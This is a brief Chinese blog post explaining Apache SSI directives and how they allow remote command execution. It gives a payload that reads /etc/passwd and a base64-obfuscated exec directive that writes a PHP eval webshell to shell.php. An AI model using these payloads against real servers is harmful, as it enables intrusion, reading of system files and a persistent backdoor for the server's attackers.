Apache SSI 远程命令执行漏洞

SSI（服务器端包含）是放置在HTML页面中的指令，并在服务页面时在服务器上对其进行评估。它们使您可以将动态生成的内容添加到现有的HTML页面，而不必通过CGI程序或其他动态技术来提供整个页面。

例如，您可以将指令放置到现有的HTML页面中，例如：

 <!--#echo var="DATE_LOCAL" -->

并且，当该页面被投放时，该片段将被评估并替换为其值：

 Tuesday, 15-Jan-2013 19:28:54 EST

 读取etc/password
 <!--#exec cmd="cat /etc/passwd" -->

也可以写入一句话木马

 <!--*#exec cmd="echo PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4=|base64 -d> shell.php"-->*

posted @ 2022-10-27 11:14 GTL_JU 阅读(41) 评论(0) 编辑收藏举报

刷新页面返回顶部

JU的博客